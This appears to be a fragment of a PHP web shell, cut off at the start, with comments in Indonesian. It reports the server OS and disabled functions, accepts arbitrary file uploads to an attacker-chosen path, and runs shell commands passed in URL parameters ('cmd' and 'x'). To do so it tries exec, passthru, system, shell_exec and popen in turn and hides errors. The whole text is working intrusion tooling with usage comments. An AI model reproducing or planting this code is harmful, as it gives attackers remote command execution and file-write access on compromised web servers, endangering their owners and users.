SERVER OS: {$os}
DISABLE_FUNCTION: {$df}";
if($_GET['req'] == 'upload'){
/* uploader usage: target/?req=upload */
@ini_set('output_buffering', 0);
$outs .= "
";
$outs .= "";
if(isset($_POST['_upl']) && $_POST['_upl'] == 'Upload'){
$webprotocol = isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1) || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https' ? "https://" : "http://";
$urlweb = $webprotocol . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']);
$pathx = $_POST['path'];
$lawlx = @$_FILES['f'];
if(@copy($lawlx['tmp_name'], $pathx."/".$lawlx['name'])){
$urlweb .= '/'.$lawlx['name'];
$outs .= 'true: '.$pathx."/".$lawlx['name'].'
';
} else {
$upfiles = @file_put_contents($pathx."/".$lawlx['name'], @file_get_contents($lawlx['tmp_name']));
if($upfiles){
$urlweb .= '/'.$lawlx['name'];
$outs .= file_exists($pathx."/".$lawlx['name']) ? 'true: '.$pathx."/".$lawlx['name'].'
' : 'false
';
} else {
$outs .= 'false
';
}
}
}
echo $outs;
die();
} else {
function execute($str){
$disfunc = @ini_get('disable_functions');
$disfuncs = !empty($disfunc) ? explode(',',$disfunc) : [];
if(function_exists("exec")){
if(!in_array("exec", $disfuncs)){
@exec($str, $out);
$out = @join("\n",$out);
return $out;
}
} else if(function_exists("passthru")){
if(!in_array("passthru", $disfuncs)){
ob_start();
@passthru($str);
$out = ob_get_clean();
return $out;
}
} else if(function_exists("system")){
if(!in_array("system", $disfuncs)){
ob_start();
@system($str);
$out = ob_get_clean();
return $out;
}
} else if(function_exists("shell_exec")){
if(!in_array("shell_exec", $disfuncs)){
$out = shell_exec($str);
return $out;
}
} elseif(is_resource($f = @popen($str, "r"))){
$out = "";
while(!@feof($f))
$out .= fread($f, 4096);
fclose($f);
return $out;
} else {
return "gak bisa jalanin perintah pak!";
}
}
/* command usage: target/?req=&cmd=uname%20-a */
if(isset($_GET['cmd']) && !empty($_GET['cmd'])){
$command = $_REQUEST['cmd'];
$out = @iconv('UTF-8', 'UTF-8', addcslashes("~$ ".$_GET['cmd']."".execute($_GET['cmd']),"\r\t\\'\0"));
echo $outs . "
" . $out . "
";
die();
} else if(isset($_GET['x'])){
echo `$_GET[x]`;
die();
}
}
}?>